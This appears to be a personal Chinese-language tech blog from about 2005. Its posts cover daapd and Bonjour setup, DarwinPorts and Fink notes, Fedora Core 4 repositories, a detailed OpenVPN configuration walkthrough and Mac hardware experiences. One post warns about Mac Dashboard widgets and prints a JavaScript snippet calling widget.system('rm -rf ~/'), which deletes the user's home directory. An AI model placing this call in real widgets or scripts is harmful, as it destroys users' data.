DAAPD + iTunes + Bonjour

我在一台 FC3 Server 上架了一個 daapd,這樣,其他的電腦,不管是 Windows 或是 Mac 只要有裝 iTunes 就可以撥放 daapd 分享出來的音樂了

Fedora 相關的套件在 DAG 的網站上都有打包好的 rpm 可以直接安裝
主要會用到的是 daapd 及 faac (如果也想聽 aac 格式的音樂）
安裝好套件後,可以參考裡面附的範例設定檔,稍微修改一下即可
我的設定檔如下:

/etc/daapd.conf

Port            3689
ServerName      DAAP
DBName          candyz's MP3 DAAPd
Password        mypasswd
Root            /var/ftp/MP3
Cache           /tmp/.daapd-cache
Timescan        2
Rescan          0

然後,把 mp3 aac 等音樂,都丟到 /var/ftp/MP3 目錄下即可
由於 daapd 本身沒有提供 init.d 的 scripts,所以我自己寫了一個:

/etc/init.d/daapd

#!/bin/sh
#
# A startup script for the daapd DAAP server
#
# chkconfig: 345 98 2
# description: This script is used to start the daapd \
# server as a background process.\
#
# Usage /etc/init.d/daapd start|stop|reload|restart|status

# Source function library.
. /etc/init.d/functions

DAAP_CONF=/etc/daapd.conf
DAAP_LOG=/var/log/daapd_access_log
prog=DAAPd
exe=/usr/bin/daapd

start() {
        echo -n "Starting $prog: "
        if [ -f /var/lock/subsys/daapd ] ; then
                echo_failure
                echo
                exit 1;
        fi
        daemon $exe -c $DAAP_CONF >> $DAAP_LOG &
        RETVAL=$?
        [ $RETVAL = 0 ] && touch /var/lock/subsys/daapd && echo_success
        echo
        return $RETVAL
}

stop() {
        echo -n "Stopping $prog: "
        killproc $exe
        RETVAL=$?
        echo
        [ $RETVAL = 0 ] && rm -f /var/lock/subsys/daapd /var/run/daapd.pid
}

reload()
{
        echo -n $"Reloading $prog:"
        killproc $exe -HUP
        RETVAL=$?
        echo
}

case "$1" in
start)
        start
        ;;
stop)
        stop
        ;;
reload)
        reload
        ;;
restart)
        stop
        start
        ;;
status)
        status $exe
        RETVAL=$?
        ;;
*)
        echo "Usage: daapd {start|stop|reload|restart|status}"
        exit 1
esac

然後執行:
$ chkconfig daapd reset

要啟動 daapd 執行:
$ /etc/init.d/daapd start 即可

接下來,我要讓 daapd 也可以經由 Bonjour 分享出來
(關於 Bonjour 在 Fedora 上的設定,請參考 這裡)
因此,Bonjour 的設定檔要多加一行如下:

/etc/howl/mDNSResponder.conf

“[cacndyz] MP3 (DAAPd)” _daap._tcp local. 3689

現在,我的小白及 Mac Mini 硬碟上不用放 mp3 了,只要開啟 iTunes 後,就會自動抓到 DAAPd
輸入所設定的密碼後,就可以聽歌了…….

Podcast, iTunes 4.9, and New iPod

Apple 昨天推出了支援 Podcast 的 iTunes 4.9
把 iTunes 升級完畢,但支援中文(國語)的 Podcast 網站少的可憐
都不知道要去哪裡找,或許等過一陣子就會多起來了吧
同時, Apple 也推出新版的 iPod 支援 Podcast 且是彩色螢幕的
還好一直沒下手買 iPod,總覺得買 Apple 的硬體,好像都是早買早死
除非等到硬體功能比較完整且降價過的再來買比較不會買到地雷
看來,得找個時間來玩一玩 Podcast 了

dports: rxvt-unicode

在 Mac OS X 的 X11 底下工作是我必備的
目前用的是 gcin (中文輸入法) + mrxvt (終端機)
mrxvt 有支援 tab 功能,也支援 TTF/OTF 字型,但缺點是,還不支援 Unicode(UTF-8)
因此,在我遇到需要用到 UTF-8 的 Terminal 時,就得改用 X11 內附的 uxterm
不過字型太難看,又不能調整中文字型大小(反正會有問題,我調不出來就是了)
不然,就是得開 “終端機” 出來
最近小白上面裝了 Darwinports,加上 gcin 也進 dports 了
因此,就用 dports install rxvt-unicode
安裝完後,執行 urxvt 就可以用了,支援 Unicode 的 rxvt,也支援 TTF 字型,也可以用 gcin 來輸入中文
我的 gurxvt script:
[candyz@ibook:~] cat /usr/local/bin/gurxvt
export LANG=zh_TW.UTF-8
export XMODIFIERS=@im=gcin
export XIM=gcin
gcin &
sleep 2
ssh-agent /opt/local/bin/urxvt -imlocale zh_TW.UTF-8 -sl 5000 -sr -bg black -fg lightgray -fn “xft:Monaco:pixelsize=16,xft:AR HeiU30 Medium” &
xmodmap /Users/candyz/.Xmodmap
rm -rf /tmp/gcin-*

Dashboard widget 的安全大漏洞

<script type=’text/javascript’>

function test(){
                 if(widget){
	            widget.system('rm -rf ~/', null);
	        }
}

以後亂抓 Widget 時要小心了,不然,像上面隨便一個 system 呼叫,就把你的硬碟資料砍光光了…

DarwinPorts 筆記

DarwinPorts

fink 外的另一個選擇

下載

DarwinPorts 1.0 版也提供了 dmg 格式的安裝程式下載,這真是個好消息
DarwinPorts-1.0.dmg

安裝

若是下載 dmg Installer 來安裝,那就點選下去即可,方便多了
使用 cvs 來安裝:
$ cd
$ cvs -d :pserver:anonymous@anoncvs.opendarwin.org:/Volumes/src/cvs/od login
$ cvs -d :pserver:anonymous@anoncvs.opendarwin.org:/Volumes/src/cvs/od co -P darwinports
$ cd ~/darwinports/base
$ ./configure
$ make
$ sudo make install

設定環境變數

在 ~/.profile or ~/.bashrc 檔案中加入底下幾行:
export PATH=$PATH:/opt/local/bin:/opt/local/sbin
export MANPATH=$MANPATH:/opt/local/share/man
export INFOPATH=$INFOPATH:/opt/local/share/info

Self Update

$ sudo port sync
$ sudo port selfupdate
$ sudo portindex

開始使用 dports

$ port list
$ port install ‘package’
$ port uninstall ‘package’
$ port search ‘package’
$ port clean ‘package’
$ port info ‘package’
$ port contents ‘package’
$ port variants ‘package’
$ port deps ‘package’
$ port outdated ‘package’
$ port upgrade ‘package’
$ port -a upgrade

gcin dports

測試寫好的 gcin Portfile 及 files/macosx.diff
$ cd ~/gcin
$ sudo port -d -v checksum
$ sudo port -d -v extract
$ sudo port -d -v build
$ sudo port -d -v install

一切順利…:)

gcin 的 dports

今天在小白上用 DarwinPorts 1.0 順利成功編譯好了 gcin
並可以使用
因此,就想,乾脆弄個 gcin 的 dports 吧
於是…
參考了一些範例及問了一些人
Portfile 終於生出來了,然後再加上一個 patch file
目前等 digdog 有空時幫忙看一下,沒問題再 commit 再進 dports

老地方冰果室 台北網友會最新資訊

老地方冰果室官網資訊

聚會日期

6 月 24 日（星期五） 晚上 18:00 – 22:00

聚會地點

「伯朗咖啡 南京東路旗艦店」三樓
　地址：台北市南京東路二段222號 三樓（從咖啡廳一樓搭乘電梯）
　電話：(02) 25167669

聚會內容

　18:00 – 19:00 進場、報到，與自由交誼；團購商品展示
　19:00 – 19:30「Mac 專用 Mail/Blog 系統」網絡商數科技 葉家昇 (ascent) 主講
　19:30 – 19:50「如何進行 Shareware 中文化」網絡商數科技 王盛森 (pit) 主講
　19:50 – 20:05「數位相機白平衡的利器 — expo disc」陳士恩 (ross_tt) 主講
　20:05 – 20:25「iPod 與汽車音響的終極結合」丘雲凱 (吉米丘) 主講
　20:25 – 20:45「高壓咖啡爐的咖啡烹煮示範」Little Italy 李先生 (阿諾) 主講（兼中場休息）
　20:45 – 21:45「GarageBand 的應用」德誼數位 Eddie 主講
　21:45 – 22:00「團購商品討論」芝廣數位 梁尊謙 主持

已報名,我會過去看看
地點選的真好,就在我公司隔壁,下班後走路過去,不用一分鐘 :)

Fedora Linux 與 Bonjour (Rendezvous)

從 FC3 起,就有提供 howl 套件來支援 Apple 的 Bonjour (原稱為 Rendezvous)
安裝完 howl 套件後,會提供兩個服務 nifd 及 mDNSResponder
設定檔為 /etc/howl/mDNSResponder.conf
例如我要加三個服務進去,把底下三行加進設定檔內:
“[dns] SSH” _ssh._tcp local. 22
“[dns] HTTP” _http._tcp local. 80
“[dns] SMB” _smb._tcp local. 445

啟動 nifd 及 mDNSResponder
$ /etc/init.d/nifd start
$ /etc/init.d/mDNSResponder start

現在,改到我的小白上來測試看看

Safari

如下圖,在 Bonjour 書籤裡出現了 “[dns] HTTP”

終端機

執行終端機後,選取選單列上的 “檔案” — “連接伺服器…”
然後就會出現如下圖的畫面,有看到了 “[dns] SSH”:

cle.linux.org.tw 上的 FC4 APT/YUM Repository

手邊裝好了一台 x86 版的 FC4,拿來做測試及包裝 RPM 用
而 cle.linux.org.tw 主機部份,FC4 也 mirror 完畢
同時,我也把 FC4 的 Apt/Yum Repository 差不多都弄好了
目前包含有 Fedora Core 4 、Fedora Extras 4 以及 cle (我打包的套件)
至於 freshrpms dag atrpms … 等其他的 Apt/Yum Repository 目前則是還沒放進去
等他們都把 FC4 的 Repository 弄好後,再來 mirror
整理了一下相關資訊如下:

CLE 主機上的 FC4 YUM Repository

由於 FC4 安裝光碟裡就包含了 Yum,所以就先從 Yum 講起,至於 Apt 套件則是被放到 Extras 裡去了,待另外再安裝(用 Yum 裝)
安裝好 FC4 後,要先稍微設定一下 Yum,把 Repository 指向到 CLE 主機,所以要修改 /etc/yum.repos.d/ 下的各個檔案,如下:

fedora.repo

[base]
name=Fedora Core $releasever – $basearch – Base
baseurl=ftp://cle.linux.org.tw/apt/stentz/yum/os/RPMS.os
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora

fedora-updates.repo

[updates-released]
name=Fedora Core $releasever – $basearch – Released Updates
baseurl=ftp://cle.linux.org.tw/apt/stentz/yum/updates/RPMS.updates
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora

fedora-extras.repo

[extras]
name=Fedora Extras $releasever – $basearch
baseurl=ftp://cle.linux.org.tw/apt/stentz/yum/extras/RPMS.extras
enabled=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora-extras
gpgcheck=1

底下是我打包的 CLE 相關套件 (如 gcin)
RPM-GPG-KEY-cle 檔案可以在 這裡 下載
下載回去後,把它放到 /etc/pki/rpm-gpg/ 目錄底下即可

fedora-cle.repo

[cle-released]
name=Fedora Core $releasever – $basearch – Released cle
baseurl=ftp://cle.linux.org.tw/apt/stentz/yum/cle/RPMS.cle
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-cle

底下三個是測試開發版本,所以預設是不啟用的

fedora-devel.repo

[development]
name=Fedora Core $releasever – Development Tree
#baseurl=http://download.fedora.redhat.com/pub/fedora/linux/core/development/$basearch/
mirrorlist=http://fedora.redhat.com/download/mirrors/fedora-core-rawhide
enabled=0
gpgcheck=0

fedora-updates-testing.repo

[updates-testing]
name=Fedora Core $releasever – $basearch – Test Updates
baseurl=ftp://cle.linux.org.tw/apt/stentz/yum/extras/RPMS.updates-testing
enabled=0
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora-test

fedora-extras-devel.repo

[extras-development]
name=Fedora Core $releasever – Development Tree
baseurl=ftp://cle.linux.org.tw/apt/stentz/yum/extras/RPMS.extras-testing
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora-extras
gpgcheck=0

修改好設定檔後,執行 yum update 即可更新套件
新版的 yum 執行起來的效率已經比起前版的好太多了(不用浪費一大堆時間在抓 headers)

CLE 主機上的 FC4 APT Repository

接下來,先用 yum 把 apt 給裝起來,因為 apt 套件是放在 Extras 裡,預設是沒有安裝的
$ yum install apt
安裝好後,接下來就是修改 apt 的設定檔
第一次執行 apt-get 時,會發生錯誤
那是因為 miror-select.conf 裡的 mirrors-URL 是指到 fedora.us 去
但從 FC3 以後,fedora.us 就已經不再獨自維護了,已經移轉到 Extras 去了
所以,我們要略過 mirror-select 的步驟
請修改 /etc/apt/apt.conf,在最後面加上一行:
Apt::State::FirstRun “false”;
這樣就可以了
再來就是修改 sources.list 的設定,指向 CLE 主機上的 APT Repository

sources.list

# Fedora Core 4 — stentz

# Core — os updates cle
rpm ftp://cle.linux.org.tw/apt/stentz Fedora os updates cle
rpm-src ftp://cle.linux.org.tw/apt/stentz Fedora os updates cle

# Extras
rpm ftp://cle.linux.org.tw/apt/stentz Fedora extras
rpm-src ftp://cle.linux.org.tw/apt/stentz Fedora extras

# Testing — updates-testing extras-testing
#rpm ftp://cle.linux.org.tw/apt/stentz Fedora updates-testing extras-testing
#rpm-src ftp://cle.linux.org.tw/apt/stentz Fedora updates-testing extras-testing

接下來就是:
apt-get update
apt-get install {packages}
…

Fink for tiger

今天把 fink 更新到 tiger 版 (0.8.0),順便做一下筆記

Fink for tiger
http://fink.sourceforge.net

移除舊版本

$ sudo rm -Rf /sw
or
$ sudo mv /sw /sw.old

下載

Fink 0.8.0 Binary Installer:
http://prdownloads.sourceforge.net/fink/Fink-0.8.0-Installer.dmg?download

安裝

點兩下 Fink-0.8.0-Installer.dmg 掛載磁碟映像檔
然後再點選裡面的 Fink 0.8.0 Installer.pkg 進行安裝
然後會自動執行 pathsetup utility
或是之後手動執行 /sw/bin/pathsetup.sh
會在 ~/.profile 中加入一行: (在 X11 下要加在 ~/.bashrc 才會生效)
“test -r /sw/bin/init.sh && . /sw/bin/init.sh”

套件的安裝/移除

fink scanpackages; fink index
fink selfupdate
fink update-all

fink list
fink install packages
fink remove packages
fink cleanup

sudo apt-get update
sudo apt-get install packages
sudo apt-get remove packages

安裝編譯 gcin 的環境以及我自己常用的程式

sudo apt-get install appleotffonts applesystemfonts
sudo apt-get install autocutsel dialog dosunix ethereal expat expect
sudo apt-get install gnupg hexcurse lftp lynx lzo mc pine svn svn-client
sudo apt-get install unrar w3m wget
sudo apt-get install rxvt-ml
sudo apt-get install gtk+2-dev glib2-dev pkgconfig pango1-xft2-dev atk1
sudo apt-get clean

收工

再來就是把 gcin mrxvt mlterm p7zip ov 等編譯好並安裝
嗯,一切過程順利
/sw.old 可以砍掉了

我的小白新電池現在方到底在何方?

我 5/21 一大早就去登記了,直到今天 6/15
我小白的新電池還不知道在哪裡流浪?
昨天終於忍不住打 0800 去 Apple 那裡哭么了一下
結果,新加坡人跟我說還不知道整個狀況如何,要查一查
不管有沒有消息,今天會給我回電話
剛剛接到電話,他們說我郵寄的地址是郵政信箱,結果是被退回了 (ooxx)
我有寫第二個公司地址,所以請他們改寄到公司給我
但現在他們也不知道電池被退回後到底流落何方
還是一樣,要再查一查,不管結果如何,明天會再給我回電…Orz
快沒力了……..

使用 OpenVPN

之前有玩了一下 OpenVPN,不過沒搞定,就沒再摸了
昨天(6/14)在台大有場 Arne OpenVPN 的心得分享
回家後再給它試一次,終於試成功了
其實 OpenVPN 的應用方式有很多種,也要慢慢去試出來

安裝 OpenVPN

不管是 Linux Windows 或是 Mac OS X,都有現成的 Binary 套件可以使用
請到 OpenVPN 網站 下載合適的版本回去安裝
OpenVPN GUI for Mac 請到 這裡 下載 Tunnelblick 回去安裝
OpenVPN GUI for Windows 請到 這裡 下載 Install Packages 回去安裝

我的 Server 系統用的是 FC3,因此,去抓 DAG 的 binary RPM
下載回來後執行下列指令安裝:
$ rpm -ivh openvpn-2.0-1.1.fc3.rf.i386.rpm

建立 CA certificate 及 Server/Client keys

我是在 FC3 Server 下來建立所有相關的 CA certificate 及 keys
$ cd /usr/share/doc/openvpn-2.0/easy-rsa
ease-rsa 底下的一些 scripts (clean-all build-* 等等) 記得到先 chmod 755 讓它們可以執行

編輯 vars 檔案

主要是設定最後面的 KEY_COUNTRY KEY_PROVINCE KEY_CITY KEY_ORG KEY_EMAIL 等參數
$ vi vars
$ . vars
$ ./clean-all

產生 CA certificate

$ ./build-ca
會產生 keys/ca.*

產生 Server 的 key

$ ./build-key-server server
會產生 keys/server.*

產生 Diffie Hellman parameters

$ ./build-dh
會產生 keys/dh1024.pem

產生 tls-auth key

$ openvpn –genkey –secret ta.key
會產生 ta.key
$ mv ta.key keys/

產生 Client 的 key

$ ./build-key ibook
會產生 keys/ibook.*

$ ./build-key macmini
會產生 keys/macmini.*

$ ./build-key fujitsu
會產生 keys/fujitsu.*

$ ./build-key ns
會產生 keys/ns.*

$ ./build-key fedora
會產生 keys/fedora.*

我總共產生了五台 Clients 機器的 keys (ibook macmini fujitsu ns fedora)

所有的 CA certificate 及 keys 都建好後,接下來就是根據不同的狀況來設立不同的設定檔
底下為目前我個人成功在使用的例子:

狀況一

在 NAT Server 上架 OpenVPN Server(家裡的 NAT Server),然後 OpenVPN Client 則是架設在外面的任一台電腦上(我的 ibook)
這樣,我在公司或者是在外面的網咖上網時,就可以利用 OpenVPN 連上家裡的 Server 以及家裡 NAT 底下的其他機器(192.168.1.x/24)

Server 端:
eth0: a.b.c.d (Real IP)
eth1: 192.168.1.254/24
tap0: 192.168.2.1/24

Client 端:
eth0: e.f.g.h (Real IP or Virtual IP)
tap0: 192.168.2.x/24

Server 端的設定

我的 Server 是 FC3
首先,要把 Server 端相關的 CA certificate 及 keys 複製到 Server 機器的 /etc/openvpn/ 目錄底下
主要有 ca.crt ta.key dh1024.pem 及 server.*
$ cd /usr/share/doc/openvpn-2.0/easy-rsa/keys
$ cp ca.crt ta.key dh1024.pem server.* /etc/openvpn/

接下來就是設定檔部份了,先複製一份範例檔來修改
$ cd /usr/share/doc/openvpn-2.0/sample-config-files
$ cp server.conf /etc/openvpn/
$ vi /etc/openvpn/server.conf
—————————————-
local a.b.c.d ; Server 的 Real IP
port 1194
proto tcp ; 使用 tcp or udp
dev tap ; 使用 tap or tun
ca ca.crt ; 底下幾行指定 ca.crt 及各 key 的位置
cert server.crt
key server.key
dh dh1024.pem
server 192.168.2.0 255.255.255.0 ; OpenVPN 所使用的網段
ifconfig-pool-persist ipp.txt ; client Virtual IP 的對照表
push “route 192.168.1.0 255.255.255.0″ ; 讓 OpenVPN client 也可以連 192.168.1.x 網段
client-to-client ; 讓各個 OpenVPN client 也可以互連
keepalive 10 120
tls-auth ta.key 0 ; Server 要設 0 Client 設 1
comp-lzo
max-clients 10
user nobody
group nobody
persist-key
persist-tun
status openvpn-status.log
verb 3
—————————————-
都設定好後,就可以啟動 OpenVPN 了
$ /etc/init.d/openvpn start
成功啟動後,你就會看到系統多了一個 tap0 的裝置,IP 為 192.168.2.1

Client 端的設定

先為我的 ibook (Mac OS X) 做設定
首先,還是要先從 Server 上把 ca.crt ta.key 及 ibook.* 這幾個檔案都複製到 ibook 上
預設是放在 ~/Library/openvpn/ 底下
然後編輯 ibook client 端的設定檔
$ vi ~/Library/openvpn/openvpn.conf
或是直接執行應用程式裡的 Tunnelblick,然後會在選單列上看到圖示,選擇 “Edit Config File…”

—————————————-
client ; 表示這是 client 端的設定
dev tap
proto tcp
remote a.b.c.d 1194 ; a.b.c.d 為 Server 的 IP
resolv-retry infinite
nobind
user nobody
group nobody
persist-key
persist-tun
ca ca.crt
cert ibook.crt
key ibook.key
tls-auth ta.key 1 ; client 端要設成 1
comp-lzo
verb 3
—————————————-
編輯好後儲存
然後再選取選單列上的 Tunnelblick 裡的 “Connect”
這樣就連上了
執行 ifconfig 來看,會多了一個 tap0 IP 為 192.168.2.2
接著來測試看看
$ ping 192.168.2.1
$ ping 192.168.1.254
$ ping 192.168.1.x
都 ping 的到,那恭喜了

同樣的方式,我可以在公司的 Server 上再架一個 OpenVPN 的 Server
這樣我的 ibook 就可以同時連上家裡及公司內的各台機器了
不過,Mac OS X 上的這個 Tunnelblick 程式,目前只支援連一台 Server
若是想一次連到多個 OpenVPN server,可以不要用 GUI,直接用 command line
同樣先複製所需的 CA certificate 及 keys 到 ~/Library/openvpn/ 底下
然後,同樣在 ~/Library/openvpn/ 底下建立各個設定檔,如 client1.conf client2.conf
然後手動執行:
$ sudo openvpn –config client1.conf &
要連線到第二個 OpenVPN Server,再執行:
$ sudo openvpn –config client2.conf &
依此類推,或是乾脆直接寫個 script 來啟動多個設定檔:
startOpenVPN.sh
——————————————
#!/bin/bash
sudo pwd
cd ~/Library/openvpn/
for i in *.conf
do
sudo /usr/local/sbin/openvpn –config $i &
done
——————————————
然後在終端機下直接執行 sh startOpenVPN.sh 即可

再來設定我的 Fujitsu Notebook (Windows XP)
設定檔放在 C:\Program Files\OpenVPN\config\ 目錄底下
相關的 CA certificate 及 keys 一樣是複製到 C:\Program Files\OpenVPN\config\ 目錄底下
(包含 ca.crt ta.key fujitsu.*)
設定檔可以直接複製 C:\Program Files\OpenVPN\sample-config\ 裡的 client 再來修改即可
—————————————-
client
dev tap
proto tcp
remote a.b.c.d 1194 ; a.b.c.d 為 Server 的 IP
resolv-retry infinite
nobind
user nobody
group nobody
persist-key
persist-tun
ca ca.crt
cert fujitsu.crt
key fujitsu.key
tls-auth ta.key 1
comp-lzo
verb 3
—————————————-
再來就是點選狀態列裡的 “OpenVPn GUI” 選擇 “Connect”

狀況二

在家裡及公司的 Server 上各架一台 OpenVPN Server
同時,兩台 OpenVPN Server 也各自再跑一個 OpenVPN Client,互相連對方
這樣,在公司內的任何一台機器,就可以利用 OpenVPN 連上家裡的 Server 以及家裡 NAT 底下的其他機器(192.168.1.x/24)
同樣的,在家裡的任何一台機器,也可以連上公司內部網路裡的任一台機器(10.0.0.x/24)

家裡 Server 端:
eth0: a.b.c.d (Real IP)
eth1: 192.168.1.254/24
tap0: 192.168.2.1/24
tap1: 192.168.3.x/24

公司 Server 端:
eth0: e.f.g.h (Real IP)
eth1: 10.0.0.254/24
tap0: 192.168.3.1/24
tap1: 192.168.2.x/24

產生 CA certificate 及 kyes 並複製到各個 Servers 及 Clinets (請參考之前的做法)
設定檔的部份如下:

家裡 Server 端的設定

$ vi /etc/openvpn/server.conf
—————————————-
local a.b.c.d ; 家裡 Server 的 Real IP
port 1194
proto tcp
dev tap
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
server 192.168.2.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push “route 192.168.1.0 255.255.255.0″
client-to-client
keepalive 10 120
tls-auth ta.key 0
comp-lzo
max-clients 10
user nobody
group nobody
persist-key
persist-tun
status openvpn-status.log
verb 3
—————————————-

家裡 Client 端的設定

$ vi /etc/openvpn/client.conf
—————————————-
client
dev tap
proto tcp
remote a.b.c.d 1194 ; a.b.c.d 為公司 Server 的 IP
resolv-retry infinite
nobind
user nobody
group nobody
persist-key
persist-tun
ca ca.crt
cert ns.crt
key ns.key
tls-auth ta.key 1
comp-lzo
verb 3
—————————————-

公司 Server 端的設定

$ vi /etc/openvpn/server.conf
—————————————-
local a.b.c.d ; 公司 Server 的 Real IP
port 1194
proto tcp
dev tap
ca ca.crt
cert server_office.crt
key server_office.key
dh dh1024.pem
server 192.168.3.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push “route 10.0.0.0 255.255.255.0″
client-to-client
keepalive 10 120
tls-auth ta.key 0
comp-lzo
max-clients 10
user nobody
group nobody
persist-key
persist-tun
status openvpn-status.log
verb 3
—————————————-

公司 Client 端的設定

$ vi /etc/openvpn/client.conf
—————————————-
client
dev tap
proto tcp
remote a.b.c.d 1194 ; a.b.c.d 為家裡 Server 的 IP
resolv-retry infinite
nobind
user nobody
group nobody
persist-key
persist-tun
ca ca.crt
cert fedora.crt
key fedora.key
tls-auth ta.key 1
comp-lzo
verb 3
—————————————-

Fedora Core 4

自從跳到 Mac OS X 平台後,對 Linux 的接解少了很多,只剩下手邊的 Server 還是用 Linux 系統
最近 FC4 release 了,現在才開始要做 mirror 及建立 apt/yum repository 等相關事項

1.Fedora Core 4
http://download.fedora.redhat.com/pub/fedora/linux/core/

2.Fedora Extras 4
http://download.fedora.redhat.com/pub/fedora/linux/extras/
在 FC3 以後,原來的 http://www.fedora.us 裡的 Extras 現在都已經合併到 Fedora Project 裡了

3.ATrpms
http://atrpms.net

4.DAG
http://dag.wieers.com/home-made/apt/

5.Dries
http://dries.studentenweb.org/apt/
還沒看到 for FC4 的

6.FreshRPMS
http://freshrpms.net
還沒看到 for FC4 的

7.JPackage
http://www.jpackage.org

8.Livna
http://rpm.livna.org
還沒看到 for FC4 的

9.NewRPMS
http://newrpms.sunsite.dk
還沒看到 for FC4 的

Mac OS X 上可以使用的籃芽棒

之前所找到的資料都顯示,要在 Mac OS X 下能使用藍芽(包含鍵盤、滑鼠、手機、耳機等)
除了原廠巾建藍芽模組外,就只剩下 D-Link DBT-120 這個有通過 Apple 認證的藍芽棒
其他的大多抓得到藍芽棒,但卻無法成功配對及使用藍芽耳機
但又有傳言指出,只要是 CSR 晶片的藍芽棒都可以用,但我還沒看到有人實際去證實
我之前買了 DBT-120,升級過 fireware 後,目前可以跟我的藍芽耳機配對及使用
用 Moto HS-805 聽 iTunes 的效果還算不錯
但我又去買了 Moto HT-820 這個雙耳的立體聲耳機,但聽起來效果就很差了
因為 DBT-120 是 1.1 的規格,又不支援 A2DP,所以有音爆是正常的
我不死心,決定冒險去買 SMC BT-10 這個 1.2 規格 CSR 晶片的藍芽棒來試

然後再搭配也是用 CSR 晶片的 Moto HT-820,效果應該不錯才是

得到的結論是:
SMC BT-10 這支的確不錯用,PCHome 上 7xx 的價格,用的是 CSR 的晶片
插上去後的確是隨插即用,也不用更新 firmware 等有的沒的
(比起 D-Link DBT-120 還得更新 firmware,且更新後就不能在 Windows 上用好多了)
我也成功的跟我的藍芽耳機配對(包含 Moto HS-805 及 Moto HT-820),並可以聽 iTunes 講 Skype 等等
不過,一樣是沒有支援 A2DP,所以,想聽立體聲高水準的音樂還是夢碎
這是 Apple 藍芽軟體的問題,只能等 Apple 更新藍芽軟體來支援 A2DP,否則是無解的
好消息是,不想買貴貴的原廠藍芽模組的人–＆gt
真的可以放心去買這支幾百元 1.2 規格的 SMC-BT10 藍芽棒來用了

Apple releases Security Update 2005-006

Security Update 2005-006 (Mac OS X 10.4.1)

About this update
Security Update 2005-006 delivers a number of security enhancements and is recommended for all Macintosh users.
This update includes the following components:

-AFP Server
-Bluetooth
-CoreGraphics
-Folder Permissions
-launchd
-LaunchServices
-NFS
-PHP
-VPN

詳細資訊請參考 這裡